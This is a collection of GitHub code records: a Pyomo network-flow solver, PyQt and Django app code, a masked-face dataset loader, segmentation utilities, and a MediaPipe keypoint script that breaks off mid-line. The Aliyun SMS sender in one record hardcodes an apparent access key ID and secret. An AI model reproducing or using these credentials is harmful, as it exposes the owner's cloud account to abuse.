= (sum(model.x[edge, k].value for edge in entering_edges) - sum(\n model.x[edge, k].value for edge in exiting_edges)) - model.nodes_balances[(k, n)]\n if (abs(difference) > 0.00001):\n print(\"BALANCES NOT HANDLED CORRECTLY FOR NODE \",n,\"AND COMMODITY \",k,\" WITH ERROR OF: \",abs(difference))\n\n\n\nif __name__ == '__main__':\n (num_nodes, num_arches, num_comodities, arc_cost, single_comodity_capacity, supply,mutual_capacities, start_nodes, end_nodes) = fileReading_PPNR.load_problem(\"datasets/minsil7.dat\")\n '''\n nodes_balances=[[0 for j in range(COMMODITY_COUNT)] for i in range(NODE_COUNT)]\n nodes_balances[0][0]=-1\n nodes_balances[4][0] = 1\n\n nodes_balances[1][1] = -1\n nodes_balances[4][1] = 1\n\n edges=[(0,1),(0,2),(0,3),(3,4),(2,4),(1,4)]\n edge_costs=dict()\n for edge in edges:\n edge_costs[edge]=1\n edge_capacities=dict()\n for edge in edges:\n edge_capacities[edge]=1'''\n linear_programming_MCMCF([node for node in range(1,num_nodes+1)], [arch for arch in range(num_arches)], [commodity for commodity in range(num_comodities)], arc_cost, single_comodity_capacity, supply,mutual_capacities, start_nodes, end_nodes)\n","repo_name":"AlessandroCavaglia/OC-2023","sub_path":"MCMCF_linear_programming.py","file_name":"MCMCF_linear_programming.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2378779824","text":"import random\nfrom aliyunsdkcore.client import AcsClient\nfrom aliyunsdkcore.request import CommonRequest\n\n'''发送短信(手机,6位验证码)'''\ndef send_sms(phone, code):\n client = AcsClient('LTAIEx3Gbdbceg2C', 
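One hedged note on the Var declaration just above: pyo.PositiveReals denotes strictly positive reals, while network-flow formulations conventionally allow zero flow on an arc. A minimal sketch with NonNegativeReals and toy index sets:

import pyomo.environ as pyo

m = pyo.ConcreteModel()
m.edges = pyo.Set(initialize=[0, 1, 2])            # toy arc ids
m.commodities = pyo.Set(initialize=["k1", "k2"])   # toy commodity ids
m.x = pyo.Var(m.edges, m.commodities, within=pyo.NonNegativeReals)  # zero flow allowed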
'MsCoWUm3x2iXaIcvtqhQLi9yj6nHxX', 'cn-hangzhou')\n\n code = \"{'code':%s}\" % (code)\n request = CommonRequest()\n request.set_accept_format('json')\n request.set_domain('dysmsapi.aliyuncs.com')\n request.set_method('POST')\n request.set_protocol_type('https') # https | http\n request.set_version('2017-05-25')\n request.set_action_name('SendSms')\n\n request.add_query_param('RegionId', 'cn-hangzhou')\n request.add_query_param('PhoneNumbers', phone)\n request.add_query_param('SignName', '北网实训组')\n request.add_query_param('TemplateCode', 'SMS_165745016')\n request.add_query_param('TemplateParam', code)\n\n response = client.do_action(request) # 开始向手机发送验证码\n # python2: print(response)\n print(str(response, encoding='utf-8'))\n\n return str(response, encoding='utf-8')\n\n# 生成验证码函数\ndef get_code(n=6, alpha=True):\n \"\"\"\n 生成随机验证码\n :param n: 代表生成几位验证码\n :param alpha: True表示生成带有字母的 False不带字母的\n :return:\n \"\"\"\n s = '' # 创建字符串变量,存储生成的验证码\n for i in range(n): # 通过for循环控制验证码位数\n num = random.randint(0, 9) # 生成随机数字0-9\n if alpha: # 需要字母验证码,不用传参,如果不需要字母的,关键字alpha=False\n upper_alpha = chr(random.randint(65, 90)) # chr():将数字转换成对应的ASCII值\n lower_alpha = chr(random.randint(97, 122))\n num = random.choice([num, upper_alpha, lower_alpha])\n # print(s)\n s = s + str(num)\n # print(n)\n return s","repo_name":"long-song/Green_Food","sub_path":"common/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24328300201","text":"from PyQt5.QtWidgets import QVBoxLayout, QFrame, QHBoxLayout, QLabel, QPushButton\nfrom PyQt5.QtCore import QSize, Qt\nfrom PyQt5.QtGui import QCursor\n\n\nclass UserManagementTable:\n def __init__(self, main_window):\n self.main_window = main_window\n\n def set_table(self, edit_funk, delete_funk, user_company_data):\n profile_role_privilege = {allowed_role[\"role\"] for allowed_role in self.main_window.user_role.children_roles}\n self.main_window.delete_layout(self.main_window.ui.user_manage_clear_frame.layout())\n user_manage_clear_layout = QVBoxLayout(self.main_window.ui.user_manage_clear_frame)\n user_manage_clear_layout.setContentsMargins(0, 0, 0, 0)\n user_manage_clear_layout.setSpacing(0)\n user_manage_clear_layout.setObjectName(\"user_manage_clear_layout\")\n background_gray = True\n for user in user_company_data:\n frame = QFrame(self.main_window.ui.user_manage_clear_frame)\n if background_gray:\n frame.setStyleSheet(\"QFrame {\\n\"\n \" background: #F2F3F6;\\n\"\n \" border-radius: 4px;\\n\"\n \"}\")\n background_gray = not background_gray\n frame.setFrameShape(QFrame.NoFrame)\n frame.setMinimumSize(QSize(0, 54))\n horizontal_layout = QHBoxLayout(frame)\n horizontal_layout.setContentsMargins(0, 0, 0, 0)\n horizontal_layout.setSpacing(0)\n frame_2 = QFrame(frame)\n frame_2.setFrameShape(QFrame.NoFrame)\n horizontal_layout_2 = QHBoxLayout(frame_2)\n horizontal_layout_2.setContentsMargins(17, 0, 0, 0)\n horizontal_layout_2.setSpacing(7)\n icon = QLabel(frame_2)\n icon.setMinimumSize(QSize(20, 20))\n icon.setMaximumSize(QSize(20, 20))\n icon.setStyleSheet(\" image: url(:/image/account_user_manage.svg);\")\n icon.setText(\"\")\n icon.setAlignment(Qt.AlignLeading | Qt.AlignLeft | Qt.AlignVCenter)\n horizontal_layout_2.addWidget(icon)\n fullname = QLabel(frame_2)\n fullname.setStyleSheet(\"color: #070808;\")\n fullname.setText(user[\"fullname\"])\n horizontal_layout_2.addWidget(fullname)\n horizontal_layout.addWidget(frame_2, 0, Qt.AlignLeft)\n email = 
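The record above ships a live-looking AccessKey pair inline; a common pattern is to load the pair from the environment instead. The variable names below are illustrative, and AcsClient is used with the same three-argument signature as in the archived code.

import os
from aliyunsdkcore.client import AcsClient

access_key_id = os.environ["ALIYUN_ACCESS_KEY_ID"]          # illustrative variable name
access_key_secret = os.environ["ALIYUN_ACCESS_KEY_SECRET"]  # illustrative variable name
client = AcsClient(access_key_id, access_key_secret, "cn-hangzhou")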
QLabel(frame)\n email.setStyleSheet(\"color: #4E50FF;\")\n email.setText(user[\"email\"].capitalize())\n horizontal_layout.addWidget(email)\n role = QLabel(frame)\n role.setText(user[\"user_role\"][\"role\"].title())\n horizontal_layout.addWidget(role)\n frame_3 = QFrame(frame)\n frame_3.setFrameShape(QFrame.NoFrame)\n horizontal_layout_3 = QHBoxLayout(frame_3)\n horizontal_layout_3.setContentsMargins(0, 0, 50, 0)\n horizontal_layout_3.setSpacing(10)\n edit_button = QPushButton(frame_3)\n edit_button.setMinimumSize(QSize(24, 24))\n edit_button.setMaximumSize(QSize(24, 24))\n edit_button.setCursor(QCursor(Qt.PointingHandCursor))\n edit_button.setStyleSheet(\"QPushButton {\\n\"\n \" image: url(:/image/edit_icon_default.svg);\\n\"\n \"}\\n\"\n \"\\n\"\n \"QPushButton:hover {\\n\"\n \" image: url(:/image/edit_icon_hover.svg);\\n\"\n \"}\\n\"\n \"\")\n edit_button.setText(\"\")\n edit_button.setIconSize(QSize(24, 24))\n edit_button.clicked.connect(edit_funk(user))\n horizontal_layout_3.addWidget(edit_button)\n delete_button = QPushButton(frame_3)\n delete_button.setMinimumSize(QSize(24, 24))\n delete_button.setMaximumSize(QSize(24, 24))\n delete_button.setCursor(QCursor(Qt.PointingHandCursor))\n delete_button.setStyleSheet(\"QPushButton {\\n\"\n \" image: url(:/image/delete_acc_icon_default.svg);\\n\"\n \"}\\n\"\n \"\\n\"\n \"QPushButton:hover {\\n\"\n \" image: url(:/image/delete_acc_icon_hover.svg);\\n\"\n \"}\")\n delete_button.setText(\"\")\n delete_button.setIconSize(QSize(24, 24))\n delete_button.clicked.connect(delete_funk(user))\n horizontal_layout_3.addWidget(delete_button)\n horizontal_layout.addWidget(frame_3, 0, Qt.AlignRight)\n horizontal_layout.setStretch(0, 4)\n horizontal_layout.setStretch(1, 2)\n horizontal_layout.setStretch(2, 1)\n horizontal_layout.setStretch(3, 1)\n user_manage_clear_layout.addWidget(frame)\n self.disable_button(user, edit_button, delete_button, profile_role_privilege)\n\n def disable_button(self, user, edit_button, delete_button, profile_role_privilege):\n user_role = user[\"user_role\"][\"role\"]\n if user[\"id\"] == self.main_window.user.id:\n delete_button.setEnabled(False)\n delete_button.setStyleSheet(\"image: url(:/image/delete_acc_icon_locked.svg);\")\n elif user_role not in profile_role_privilege:\n delete_button.setEnabled(False)\n delete_button.setStyleSheet(\"image: url(:/image/delete_acc_icon_locked.svg);\")\n edit_button.setEnabled(False)\n edit_button.setStyleSheet(\"image: url(:/image/edit_icon_locked.svg);\")\n","repo_name":"dmitry-vokhmin/Moving_Calc_GUI","sub_path":"view/pages/user_management_table_ui.py","file_name":"user_management_table_ui.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15202254714","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import ProductViewSet, UnitCreateAPIView, UnitAPIView\n\nrouter = DefaultRouter()\nrouter.register('', ProductViewSet, basename='product')\n\nurlpatterns = [\n path('products/', include(router.urls)),\n path('units/', UnitCreateAPIView.as_view()),\n path('units//', UnitAPIView.as_view()),\n]\n","repo_name":"TamTran72111/store-manager","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6368647099","text":"from pathlib import Path\nimport typing as tp\n\nimport cv2\nfrom 
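For reference, the router registration in the urls.py record above ('' prefix with basename='product', included under 'products/') resolves to roughly the endpoints sketched below; the unit detail route's path converter (e.g. <int:pk>) appears to have been dropped during text extraction, leaving 'units//'.

# Plain-data sketch of the resulting endpoints (names follow DRF router
# conventions; the two plain APIView routes get no router-generated name):
ROUTES = [
    ("product-list",   "products/"),       # GET list / POST create
    ("product-detail", "products/<pk>/"),  # GET / PUT / PATCH / DELETE
    (None,             "units/"),          # UnitCreateAPIView
    (None,             "units/<pk>/"),     # UnitAPIView; converter assumed
]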
torchvision.transforms import Compose, Normalize, ColorJitter, ToTensor, ToPILImage, RandomApply, RandomHorizontalFlip\nfrom torch.utils.data import Dataset\n\n\ndef transforms():\n return Compose([\n ToPILImage(),\n RandomHorizontalFlip(),\n RandomApply([ColorJitter(0.05, 0.05, 0.05)], p=0.5),\n ToTensor(),\n Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\n\ndef test_transforms():\n return Compose([\n ToTensor(),\n Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\n\nclass LFWDataset(Dataset):\n OPEN_FACE_DIR_NAME = \"LFW_without_Mask/LFW_without_Mask\"\n MASKED_FACE_DIR_NAME = \"Masked_LFW_Dataset/Masked_LFW_Dataset\"\n\n def __init__(self, path: str, transform: Compose = None) -> None:\n self.root_path = Path(path)\n self.transform = transform\n\n self.face_paths = []\n self.face_is_open = []\n self.face_ids = []\n self.name_to_idx = {}\n\n self._read_data()\n\n def __getitem__(self, idx: int) -> tp.Dict[str, tp.Any]:\n path = self.face_paths[idx]\n img = cv2.imread(path)\n img = cv2.resize(img, (112, 112))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.transform is not None:\n img = self.transform(img)\n return {\n \"img\": img,\n \"face_type\": self.face_is_open[idx],\n \"face_idx\": self.face_ids[idx],\n \"path\": path\n }\n\n def __len__(self) -> int:\n return len(self.face_paths)\n\n def _read_data(self) -> None:\n open_faces_dir = self.root_path / self.OPEN_FACE_DIR_NAME\n close_face_dir = self.root_path / self.MASKED_FACE_DIR_NAME\n\n for filepath in open_faces_dir.glob(\"./*/*\"):\n if not filepath.is_file():\n continue\n\n person_name = filepath.parent.name\n if person_name not in self.name_to_idx:\n self.name_to_idx[person_name] = len(self.name_to_idx)\n\n self.face_paths.append(str(filepath.absolute()))\n self.face_ids.append(self.name_to_idx[person_name])\n self.face_is_open.append(1)\n\n for filepath in close_face_dir.iterdir():\n if not filepath.is_file():\n continue\n\n person_name = \"_\".join(filepath.name.split(\"_\")[:-1])\n\n self.face_paths.append(str(filepath.absolute()))\n self.face_ids.append(self.name_to_idx[person_name])\n self.face_is_open.append(0)\n\n @property\n def num_classes(self) -> int:\n return len(self.name_to_idx)\n\n\nclass TestDataset(Dataset):\n def __init__(self, paths: tp.List[str], transform: Compose = None) -> None:\n self.paths = paths\n self.transform = transform\n\n def __getitem__(self, idx: int) -> tp.Dict[str, tp.Any]:\n path = self.paths[idx]\n img = cv2.imread(path)\n img = cv2.resize(img, (112, 112))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if self.transform is not None:\n img = self.transform(img)\n return {\n \"img\": img,\n \"path\": path\n }\n\n def __len__(self) -> int:\n return len(self.paths)\n\n\nif __name__ == \"__main__\":\n dataset = LFWDataset(\"data\")\n","repo_name":"Serega6678/INF634","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70495542334","text":"import numpy as np\nimport torch\nfrom PIL import Image\nfrom sklearn.metrics import pair_confusion_matrix\n\ndef get_coordinate_tensors(x_max, y_max):\n x_map = np.tile(np.arange(x_max), (y_max,1))/x_max*2 - 1.0\n y_map = np.tile(np.arange(y_max), (x_max,1)).T/y_max*2 - 1.0\n\n x_map_tensor = torch.from_numpy(x_map.astype(np.float32)).cuda()\n y_map_tensor = torch.from_numpy(y_map.astype(np.float32)).cuda()\n\n return x_map_tensor, y_map_tensor\n\ndef get_center(part_map, 
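A sketch of wiring the LFWDataset above into a DataLoader with its train-time transforms; it assumes the two LFW directory trees that _read_data() expects exist under "data", and imports from the record's src/data.py path.

from torch.utils.data import DataLoader
from src.data import LFWDataset, transforms  # path per the archived sub_path

dataset = LFWDataset("data", transform=transforms())
loader = DataLoader(dataset, batch_size=32, shuffle=True, num_workers=2)

batch = next(iter(loader))
print(batch["img"].shape)      # torch.Size([32, 3, 112, 112]) after resize + ToTensor
print(batch["face_type"][:5])  # 1 = unmasked face, 0 = masked face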
self_referenced=False):\n\n h,w = part_map.shape\n x_map, y_map = get_coordinate_tensors(h,w)\n\n x_center = (part_map * x_map).sum()\n y_center = (part_map * y_map).sum()\n\n if self_referenced:\n x_c_value = float(x_center.cpu().detach())\n y_c_value = float(y_center.cpu().detach())\n x_center = (part_map * (x_map - x_c_value)).sum() + x_c_value\n y_center = (part_map * (y_map - y_c_value)).sum() + y_c_value\n\n return x_center, y_center\n\ndef get_centers(part_maps, detach_k=True, epsilon=1e-3, self_ref_coord=False, yx=False):\n C,H,W = part_maps.shape\n centers = []\n for c in range(C):\n part_map = part_maps[c,:,:] + epsilon\n k = part_map.sum()\n part_map_pdf = part_map/k\n x_c, y_c = get_center(part_map_pdf, self_ref_coord)\n if yx:\n centers.append(torch.stack((y_c, x_c), dim=0).unsqueeze(0))\n else:\n centers.append(torch.stack((x_c, y_c), dim=0).unsqueeze(0))\n return torch.cat(centers, dim=0)\n\ndef batch_get_centers(pred_softmax, yx=False):\n B,C,H,W = pred_softmax.shape\n\n centers_list = []\n for b in range(B):\n centers_list.append(get_centers(pred_softmax[b], yx=yx).unsqueeze(0))\n return torch.cat(centers_list, dim=0)\n\n\ndef batch_get_corners(pred_softmax):\n B,C,H,W = pred_softmax.shape\n\n corners_list1 = []\n corners_list2 = []\n for b in range(B):\n corners_list1.append(get_corners(pred_softmax[b])[0].unsqueeze(0))\n corners_list2.append(get_corners(pred_softmax[b])[1].unsqueeze(0))\n return torch.cat(corners_list1, dim=0), torch.cat(corners_list2, dim=0)\n\n\ndef get_corners(part_maps, detach_k=True, epsilon=1e-3, self_ref_coord=False):\n C,H,W = part_maps.shape\n corners1 = []\n corners2 = []\n for c in range(C):\n part_map = part_maps[c,:,:] + epsilon\n k = part_map.sum()\n part_map_pdf = part_map/k\n x_min, y_min, x_max, y_max = get_corner(part_map_pdf, self_ref_coord)\n corners1.append(torch.stack((x_min, y_min), dim=0).unsqueeze(0))\n corners2.append(torch.stack((x_max, y_max), dim=0).unsqueeze(0))\n return torch.cat(corners1, dim=0), torch.cat(corners2, dim=0)\n\ndef get_corner(part_map, self_referenced=False):\n\n h,w = part_map.shape\n x_map, y_map = get_coordinate_tensors(h,w)\n\n x_min = (part_map * x_map).min()\n y_min = (part_map * y_map).min()\n x_max = (part_map * x_map).max()\n y_max = (part_map * y_map).max()\n\n if self_referenced:\n x_c_value = float(x_center.cpu().detach())\n y_c_value = float(y_center.cpu().detach())\n x_center = (part_map * (x_map - x_c_value)).sum() + x_c_value\n y_center = (part_map * (y_map - y_c_value)).sum() + y_c_value\n\n return x_min, y_min, x_max, y_max\n\n\n\nclass Colorize(object):\n def __init__(self, n=22):\n self.cmap = color_map(n)\n print(self.cmap)\n self.cmap = torch.from_numpy(self.cmap[:n])\n\n def __call__(self, gray_image):\n size = gray_image.shape\n color_image = np.zeros((3, size[0], size[1]), dtype=np.uint8)\n\n for label in range(0, len(self.cmap)):\n mask = (label == gray_image)\n color_image[0][mask] = self.cmap[label][0]\n color_image[1][mask] = self.cmap[label][1]\n color_image[2][mask] = self.cmap[label][2]\n\n # handle void\n mask = (255 == gray_image)\n color_image[0][mask] = color_image[1][mask] = color_image[2][mask] = 255\n\n return color_image\n\ndef color_map(N=256, normalized=False):\n def bitget(byteval, idx):\n return ((byteval & (1 << idx)) != 0)\n\n dtype = 'float32' if normalized else 'uint8'\n cmap = np.zeros((N, 3), dtype=dtype)\n for i in range(N):\n r = g = b = 0\n c = i\n for j in range(8):\n r = r | (bitget(c, 0) << 7-j)\n g = g | (bitget(c, 1) << 7-j)\n b = b | (bitget(c, 2) << 
7-j)\n c = c >> 3\n\n cmap[i] = np.array([r, g, b])\n\n cmap = cmap/255 if normalized else cmap\n return cmap\n\ndef denseCRF(img, pred):\n import pydensecrf.densecrf as dcrf\n from pydensecrf.utils import unary_from_softmax\n N,H,W = pred.shape\n\n d = dcrf.DenseCRF2D(W, H, N) # width, height, nlabels\n U = unary_from_softmax(pred)\n d.setUnaryEnergy(U)\n\n d.addPairwiseGaussian(sxy=3, compat=5)\n\n Q = d.inference(5)\n Q = np.array(Q).reshape((N,H,W)).transpose(1,2,0)\n\n return Q\n\n\ndef argmax_onehot(x, dim=1):\n m = torch.argmax(x, dim=dim, keepdim=True)\n x = torch.zeros_like(x, memory_format=torch.legacy_contiguous_format).scatter_(dim, m, 1.0)\n return x\n\ndef _fast_hist(label_true, label_pred, n_class):\n mask = (label_true >= 0) & (label_true < n_class)\n hist = np.bincount(\n n_class * label_true[mask].astype(int) + label_pred[mask],\n minlength=n_class ** 2,\n ).reshape(n_class, n_class)\n return hist\n\n\ndef scores(label_trues, label_preds, n_class, class_names=None):\n hist = np.zeros((n_class, n_class))\n for lt, lp in zip(label_trues, label_preds):\n hist += _fast_hist(lt.flatten(), lp.flatten(), n_class)\n acc = np.diag(hist).sum() / hist.sum()\n acc_cls = np.diag(hist) / hist.sum(axis=1)\n acc_cls = np.nanmean(acc_cls)\n iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))\n valid = hist.sum(axis=1) > 0 # added\n mean_iu = np.nanmean(iu[valid])\n freq = hist.sum(axis=1) / hist.sum()\n fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()\n cls_iu = dict(zip(range(n_class) if class_names is None else class_names, iu))\n\n return {\n \"Pixel Accuracy\": acc,\n \"Mean Accuracy\": acc_cls,\n \"Frequency Weighted IoU\": fwavacc,\n \"Mean IoU\": mean_iu,\n \"Class IoU\": cls_iu,\n }\n\n\ndef adjusted_rand_score_overflow(labels_true, labels_pred):\n (tn, fp), (fn, tp) = pair_confusion_matrix(labels_true, labels_pred)\n\n # Special cases: empty data or full agreement\n if fn == 0 and fp == 0:\n return 1.0\n (tn, fp), (fn, tp) = (tn / 1e4, fp / 1e4), (fn / 1e4, tp / 1e4)\n return 2. * (tp * tn - fn * fp) / ((tp + fn) * (fn + tn) +\n (tp + fp) * (fp + tn))\n\n\ndef seed_worker(id):\n process_seed = torch.initial_seed()\n # Back out the base_seed so we can use all the bits.\n base_seed = process_seed - id\n ss = np.random.SeedSequence([id, base_seed])\n # More than 128 bits (4 32-bit words) would be overkill.\n np.random.seed(ss.generate_state(4))\n\n\ndef pil_loader(path, type):\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert(type)\n\n\ndef pad_if_smaller(img, size, fill=None):\n\n min_size = min(img.shape[:2])\n if min_size < size:\n ow, oh = img.shape[:2]\n padh = size - oh if oh < size else 0\n padw = size - ow if ow < size else 0\n pad = ((padw // 2, padw - padw // 2), (padh // 2, padh - padh // 2), (0,0)) if len(img.shape) == 3 else ((padw // 2, padw - padw // 2), (padh // 2, padh - padh // 2))\n if fill is None:\n img = np.pad(img, pad, 'edge')\n else:\n img = np.pad(img, pad, 'constant', constant_values=fill)\n return img\n\n \n","repo_name":"DeepakSridhar/spask","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73463185536","text":"from __future__ import unicode_literals\nfrom django.db import models\nfrom localflavor.us.models import PhoneNumberField, USStateField, \\\n USZipCodeField\n\n\nclass Customer(models.Model):\n \"\"\"\n This class is the customer database table. 
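A CPU-only check of argmax_onehot from the utils record above, restated without the legacy memory_format argument; the coordinate/center helpers are skipped here because get_coordinate_tensors calls .cuda() unconditionally.

import torch

def argmax_onehot(x, dim=1):
    # One-hot of the argmax along `dim`, same shape as the input.
    m = torch.argmax(x, dim=dim, keepdim=True)
    return torch.zeros_like(x).scatter_(dim, m, 1.0)

logits = torch.tensor([[0.1, 2.0, -1.0],
                       [3.0, 0.0,  0.5]])
print(argmax_onehot(logits))
# tensor([[0., 1., 0.],
#         [1., 0., 0.]])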
It contains a function\n that allows searching of fields.\n \"\"\"\n\n signup_date = models.DateTimeField(auto_now_add=True)\n first_name = models.CharField(max_length=200)\n last_name = models.CharField(max_length=200)\n street_address = models.CharField(max_length=200)\n city = models.CharField(max_length=200)\n state = USStateField()\n zip_code = USZipCodeField()\n primary_phone = PhoneNumberField(blank=True, null=True)\n secondary_phone = PhoneNumberField(blank=True, null=True)\n email = models.EmailField(blank=True, null=True)\n vet_name = models.CharField(max_length=200, blank=True, null=True)\n vet_phone = PhoneNumberField(blank=True, null=True)\n emergency_contact_name = models.CharField(max_length=200,\n blank=True,\n null=True)\n emergency_contact_phone = PhoneNumberField(blank=True, null=True)\n contract_on_file = models.BooleanField()\n left_rating = models.BooleanField()\n allows_pics = models.BooleanField()\n mileage = models.IntegerField()\n notes = models.TextField(blank=True, null=True)\n\n def __str__(self):\n \"\"\"\n This is the text that is returned with the object\n \"\"\"\n\n return '{} {}, {}, {}'.format(self.first_name,\n self.last_name,\n self.primary_phone,\n self.email)\n\n @property\n def full_name(self):\n \"\"\"\n :return: Custom property with the full name.\n \"\"\"\n\n return '{} {}'.format(self.first_name,\n self.last_name)\n\n @staticmethod\n def customer_search(search_query):\n \"\"\"\n Searches the database fields for the search query provided.\n\n :param search_query: str/int: This param is created by\n request.POST and sent through views.py\n :return: Returns a list of objects that contains the search\n query in any of its fields.\n \"\"\"\n\n customers = []\n kwargs = {}\n is_string = False\n\n # Tests the search_query to see if it's an integer or string.\n try:\n search_query = int(search_query)\n except:\n is_string = True\n\n # Manually created dict to define the field type. Either integer\n # or string. Any new fields that need to be included in the\n # search are required to be in this dict.\n fields = {'first_name': 'string',\n 'last_name': 'string',\n 'street_address': 'string',\n 'city': 'string',\n 'state': 'string',\n 'zip_code': 'integer',\n 'primary_phone': 'integer',\n 'secondary_phone': 'integer',\n 'email': 'string',\n 'vet_name': 'string',\n 'vet_phone': 'integer',\n 'emergency_contact_name': 'string',\n 'emergency_contact_phone': 'integer',\n 'mileage': 'integer',\n 'notes': 'string'}\n\n # Builds the dict with the fields of the same data type\n for k, v in fields.items():\n if v == 'string':\n if is_string:\n kwargs.update({k + '__icontains': search_query})\n else:\n continue\n elif v == 'integer':\n if not is_string:\n kwargs.update({k + '__icontains': search_query})\n else:\n continue\n\n # Takes the key:value pair, filters the fields and applies\n # any results to a list of objects.\n for k, v in kwargs.items():\n args = {k: v}\n db_query = Customer.objects.filter(**args)\n customers += list(db_query)\n\n return list(set(customers))\n\n\nclass Pet(models.Model):\n \"\"\"\n This class is the pet database table. 
It contains a function\n that allows searching of fields.\n \"\"\"\n\n name = models.CharField(max_length=200)\n customer = models.ForeignKey(Customer)\n animal_type = models.CharField(max_length=200)\n\n def __str__(self):\n \"\"\"\n This is the text that is returned with the object\n \"\"\"\n\n return 'Owner: {} {} - ' \\\n 'Pet Name: {} - ' \\\n 'Animal: {}'.format(self.customer.first_name,\n self.customer.last_name,\n self.name,\n self.animal_type)\n\n @staticmethod\n def pet_search(search_query):\n \"\"\"\n Searches the database fields for the search query provided.\n\n :param search_query: str/int: This param is created by\n request.POST and sent through views.py\n :return: Returns a list of objects that contains the search\n query in any of its fields.\n \"\"\"\n\n pets = []\n kwargs = {}\n\n if type(search_query) == int:\n return pets\n\n # Manually created dict to define the field type. Either integer\n # or string. Any new fields that need to be included in the\n # search are required to be in this dict.\n fields = {'name': 'string', 'animal_type': 'string'}\n\n # Builds the dict with the fields of the same data type\n for k, v in fields.items():\n kwargs.update({k + '__icontains': search_query})\n\n # Takes the key:value pair, filters the fields and applies\n # any results to a list of objects.\n for k, v in kwargs.items():\n args = {k: v}\n db_query = Pet.objects.filter(**args)\n pets += list(db_query)\n\n return list(set(pets))\n\n\nclass Service(models.Model):\n \"\"\"\n This class is the service database table. These are the services offered.\n \"\"\"\n\n name = models.CharField(max_length=200)\n price = models.DecimalField(max_digits=10, decimal_places=2)\n\n def __str__(self):\n \"\"\"\n This is the text that is returned with the object\n \"\"\"\n return 'Service: {} - Price: ${}'.format(self.name,\n self.price)\n\n\nclass Order(models.Model):\n \"\"\"\n This class is the order database table. All the order information\n will be stored here.\n \"\"\"\n\n order_date = models.DateTimeField(auto_now_add=True)\n customer = models.ForeignKey(Customer)\n start_date = models.DateField(auto_now=False)\n end_date = models.DateField(auto_now=False)\n total_visits = models.IntegerField(null=True)\n total_mileage = models.IntegerField(null=True, blank=True)\n amount_due = models.DecimalField(max_digits=10,\n decimal_places=2,\n blank=True,\n null=True)\n services = models.ForeignKey(Service, null=True)\n paid = models.BooleanField(default=False)\n\n def __str__(self):\n \"\"\"\n This is the text that is returned with the object\n \"\"\"\n return 'Order Number: {}, ' \\\n 'Customer: {} {}, ' \\\n 'Start Date: {}, ' \\\n 'End Date: {}, ' \\\n 'Amount Due: {}, ' \\\n 'Paid: {}'.format(self.id,\n self.customer.first_name,\n self.customer.last_name,\n self.start_date,\n self.end_date,\n self.amount_due,\n self.paid)\n","repo_name":"dancaps/sps","sub_path":"pet_sitting/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28483177518","text":"import datetime as dt\n\n\ndef convert_to_datetime_format(date_str):\n try:\n # Try to parse the input as \"%Y-%m-%d %H:%M:%S\"\n date = dt.datetime.strptime(date_str, \"%Y-%m-%d %H:%M:%S\")\n except ValueError:\n try:\n # Try to parse the input as \"%Y-%m-%d\" and add time as 00:00:00\n date = dt.datetime.strptime(date_str, \"%Y-%m-%d\")\n except ValueError:\n raise ValueError(\"Invalid date format. 
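The two *_search staticmethods above issue one queryset per candidate field and merge results in Python; a sketch of an equivalent single-query variant with Q objects, shown for a few of the Customer fields (same icontains semantics):

from django.db.models import Q
from pet_sitting.models import Customer  # app path per the archived sub_path

def customer_search_q(search_query):
    query = Q()
    for field in ("first_name", "last_name", "city", "email", "notes"):
        query |= Q(**{f"{field}__icontains": search_query})
    return Customer.objects.filter(query).distinct()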
Please use either 'YYYY-MM-DD' or 'YYYY-MM-DD HH:MM:SS'.\")\n\n return date\n","repo_name":"ashkanans/data-mining-project","sub_path":"hw1/repo/Problem7/Common.py","file_name":"Common.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36169438098","text":"import cv2\nimport mediapipe as mp\n\n# Initialize mediapipe holistic model\nmp_face_mesh = mp.solutions.face_mesh\n\nmp_holistic = mp.solutions.holistic\nholistic = mp_holistic.Holistic()\n\nREYE = [\n 33, 7, 163, 144, 145, 153, 154, 155, 133,\n 246, 161, 160, 159, 158, 157, 173,\n][::2]\nLEYE = [\n 263, 249, 390, 373, 374, 380, 381, 382, 362,\n 466, 388, 387, 386, 385, 384, 398,\n][::2]\nNOSE=[\n 1,2,98,327\n]\nSLIP = [\n 78, 95, 88, 178, 87, 14, 317, 402, 318, 324, 308,\n 191, 80, 81, 82, 13, 312, 311, 310, 415,\n]\nPOSE = [\n 11,13,15,12,14,16,23,24,\n]\n\ndef draw_specific_keypoints(image, keypoints, indices, color=(0, 255, 0), radius=3):\n for idx in indices:\n cv2.circle(image, keypoints[idx], radius, color, -1)\n\n# Read the image\nimage = cv2.imread('ok.png')\n# Convert the BGR image to RGB before processing\nresults = holistic.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n\n# Extract keypoints\nif results.face_landmarks:\n # Convert landmarks to a list of tuples\n keypoints = [(int(landmark.x * image.shape[1]), 